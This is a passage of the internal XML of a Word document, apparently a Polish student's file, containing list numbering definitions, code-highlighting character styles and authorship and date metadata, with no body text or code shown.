      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0415001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4069" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0415000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4789" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04150019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5509" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0415001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6229" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0415000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6949" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04150019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7669" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0415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18022A52"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C8D418AA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1D551D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="27E87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F5A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="46CC6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0D86"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E90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437B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C8D418A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9370CCD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AFEC7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C40E8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F1AE4396"/>
    <w:lvl w:ilvl="0" w:tplc="CB643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81AF4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5D88B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5BF6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="83C0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0393D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4B9E825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6A3464"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="76621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B243E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="328C8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D656D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="934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55C3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="60701A70"/>
    <w:lvl w:ilvl="0" w:tplc="CB643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06539">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="647317893">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1226910268">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1952278387">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1305355269">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="866679466">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2065131454">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="875972485">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="2111390665">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="2062166906">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="2118937399">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1162281655">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1432503764">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="278026707">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="4499051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2"/>
    <w:rsid w:val="00066C22"/>
    <w:rsid w:val="00083482"/>
    <w:rsid w:val="000C3DA8"/>
    <w:rsid w:val="001C447C"/>
    <w:rsid w:val="00241D83"/>
    <w:rsid w:val="002944F7"/>
    <w:rsid w:val="002C59A6"/>
    <w:rsid w:val="002F7C5E"/>
    <w:rsid w:val="004011E4"/>
    <w:rsid w:val="0045096F"/>
    <w:rsid w:val="004D0B72"/>
    <w:rsid w:val="00500D12"/>
    <w:rsid w:val="005335ED"/>
    <w:rsid w:val="005613A8"/>
    <w:rsid w:val="006043A3"/>
    <w:rsid w:val="00650B42"/>
    <w:rsid w:val="0074160C"/>
    <w:rsid w:val="007655E4"/>
    <w:rsid w:val="007D738D"/>
    <w:rsid w:val="007E50BE"/>
    <w:rsid w:val="00812475"/>
    <w:rsid w:val="00842F30"/>
    <w:rsid w:val="00872E84"/>
    <w:rsid w:val="008A116B"/>
    <w:rsid w:val="00901B38"/>
    <w:rsid w:val="00946BEE"/>
    <w:rsid w:val="009A2619"/>
    <w:rsid w:val="009E55A1"/>
    <w:rsid w:val="00A0381C"/>
    <w:rsid w:val="00A23CFC"/>
    <w:rsid w:val="00A33A97"/>
    <w:rsid w:val="00A759E5"/>
    <w:rsid w:val="00AF1AEC"/>
    <w:rsid w:val="00BC683D"/>
    <w:rsid w:val="00C15F9C"/>
    <w:rsid w:val="00D40069"/>
    <w:rsid w:val="00DC73CD"/>
    <w:rsid w:val="00E03455"/>
    <w:rsid w:val="00E93C75"/>
    <w:rsid w:val="00F62EE7"/>
    <w:rsid w:val="00F8654F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726A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5E2724EE-8E36-4B05-B335-7D8FF092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3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3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3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3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3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3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3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3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83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83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34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34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34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34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34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34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3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3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3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0069"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/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0069"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New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34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34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3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34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3482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F8654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ljs-type">
    <w:name w:val="hljs-type"/>
    <w:basedOn w:val="Domylnaczcionkaakapitu"/>
    <w:rsid w:val="005335ED"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="Domylnaczcionkaakapitu"/>
    <w:rsid w:val="005335ED"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="Domylnaczcionkaakapitu"/>
    <w:rsid w:val="005335ED"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="Domylnaczcionkaakapitu"/>
    <w:rsid w:val="005335ED"/>
  </w:style>
  <w:style w:type="character" w:styleId="Pogrubienie">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Domylnaczcionkaakapitu"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="005335ED"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="Domylnaczcionkaakapitu"/>
    <w:rsid w:val="009A2619"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-meta">
    <w:name w:val="hljs-meta"/>
    <w:basedOn w:val="Domylnaczcionkaakapitu"/>
    <w:rsid w:val="009A2619"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-deletion">
    <w:name w:val="hljs-deletion"/>
    <w:basedOn w:val="Domylnaczcionkaakapitu"/>
    <w:rsid w:val="009A2619"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-addition">
    <w:name w:val="hljs-addition"/>
    <w:basedOn w:val="Domylnaczcionkaakapitu"/>
    <w:rsid w:val="009A2619"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-title">
    <w:name w:val="hljs-title"/>
    <w:basedOn w:val="Domylnaczcionkaakapitu"/>
    <w:rsid w:val="00A23CFC"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-params">
    <w:name w:val="hljs-params"/>
    <w:basedOn w:val="Domylnaczcionkaakapitu"/>
    <w:rsid w:val="00A23CFC"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-literal">
    <w:name w:val="hljs-literal"/>
    <w:basedOn w:val="Domylnaczcionkaakapitu"/>
    <w:rsid w:val="00A23CFC"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="Domylnaczcionkaakapitu"/>
    <w:rsid w:val="00A23CFC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2E8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2E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2E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790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4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2032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Potocki (264122)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Michał Potocki (264122)</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <cp:lastPrinted>2024-06-01T14:06:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-01T11:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-01T14:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>